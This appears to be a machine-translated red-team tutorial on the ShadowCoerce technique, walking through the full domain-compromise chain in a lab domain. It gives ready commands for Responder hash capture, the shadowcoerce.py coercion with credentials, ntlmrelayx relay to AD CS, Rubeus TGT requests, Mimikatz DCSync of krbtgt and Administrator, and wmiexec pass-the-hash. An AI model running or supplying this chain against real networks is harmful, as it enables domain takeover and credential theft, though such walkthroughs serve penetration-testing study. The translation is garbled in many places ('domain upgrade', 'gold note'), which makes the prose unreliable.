domain controller

Forcing the domain controller computer account to authenticate to a host controlled by a threatened person may cause the domain to be compromised . The most notable technique involving mandatory authentication is the use of encrypted file system remote protocols ( MS-EFSR ) Of PetitPotam attack . However , This is not the only protocol that can be used for domain upgrade . Aware that alternative protocols that may be abused may bring advantages to red team operators , Because the blue team may not implement policies to prevent the domain upgrade of various protocols .

according to Microsoft file , File server remote VSS agreement ( MS-FSRVP ) Used to create a shadow copy of a file share on a remote computer 、 Perform application backup and recovery SMB2 Data on file share . In order for the domain controller to perform these operations , File servers need to be installed from the server role VSS Agency service . however , This protocol discloses two methods that can be used for domain upgrade , Because they all depend on remote UNC route . These methods are ：

1. IsPath Support
2. IsPathShadowCopyed

therefore , Can collect information about domain controller computer accounts NTLMv2 Hash and forward it to the certification authority , For registration Base64 certificate , This certificate can be used to pass Kerberos Authenticate on the domain controller . The figure below illustrates the use of VSS Agent service for domain upgrade (ShadowCoerce) Technical steps .

In order to be able to use this protocol for offensive operations , The domain controller should have the role installed “ File server VSS Agency service ”.

Before the actual attack , Collect information about the machine account controller NTLMv2 The hash can be used as a verification that the service is running and the domain upgrade is feasible . Need to run on the host SMB The listener can capture the hash .

sudo responder -I eth0 -e 10.0.0.3 -b -A -v

Charlie Bromberg A post called ShadowCoerce The proof of concept code , To demonstrate IsPathShadowCopied and IsPathSupported How methods can be misused for offensive operations . The execution of the code will force the machine account of the domain controller to request from the system controlled by the attacker “ NETLOGON ” share . The work is based on Lionel Gilles A discovery of , The discovery was made public at a local gathering in Paris .

The tool requires valid domain credentials for a standard user account 、 The listener IP And domain controller IP. It should be noted that , During the first execution , May not be able to connect to the pipe . however , Executing the same command again will execute the connection .

python3 shadowcoerce.py -d "purple.lab" -u "pentestlab" -p "Password1234" 10.0.0.3 10.0.0.1

because SMB Listener is running on host ,​​ Therefore, the domain controller computer account NTLMv2 The hash will be generated by Responder Capture .

If there is a certification authority on the domain , It's similar to PetitPotam technology , The hash of the domain controller computer account can be passed through HTTP Relay to CA The server . The goal of targeting the certification authority server is to move authentication to certificates , And Net-NTLMv2 Hash compared to , It will be more useful . Use this authentication , The machine account will register a certificate , This certificate may be used in conjunction with Rubeus And other tools to perform authentication and request ticket granting ticket (TGT).

python3 ntlmrelayx.py -t http://ca/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

After successful certification , The certificate will be in Base64 Format issue .

Rubeus It's a C# project , It can be executed from memory and connected with Kerberos Protocol interaction , To perform offensive operations during red team engagements . Use the previously generated certificate , From the key distribution center of the domain controller computer account (KDC) Request ticket grant ticket .

Rubeus.exe asktgt /user:DC$ /certificate:<base64-certificate> /ptt

switch “ /ptt ” The ticket will be cached in the current session . Holding a ticket for a domain controller computer account is equivalent to domain administrator privileges , And can perform the lifting operation , For example, dump the password hash of the domain user 、 Create a gold ticket to maintain persistence or use the domain administrator's hash to establish a session with the domain controller .

The DCSync Technology is already in Mimikatz Already realized , Available for retrieval NTLM Hash Of krbtgt Account . Using this hash, you can create a gold note to maintain the highest permissions of the domain , Until all the objectives of the assessment are met .

mimikatz # lsadump::dcsync /user:krbtgt

perhaps , Using the same technology , High privileged accounts can be retrieved （ For example, domain administrator ） Hash value of , To establish direct connections to domain controllers and other high-value targets on the domain .

lsadump::dcsync /domain:purple.lab /user:Administrator

Impacket Set of “ wmiexec ” Can be used through WMI The protocol passes hashes and establishes a direct connection to the domain controller .

python3 wmiexec.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71 [email protected]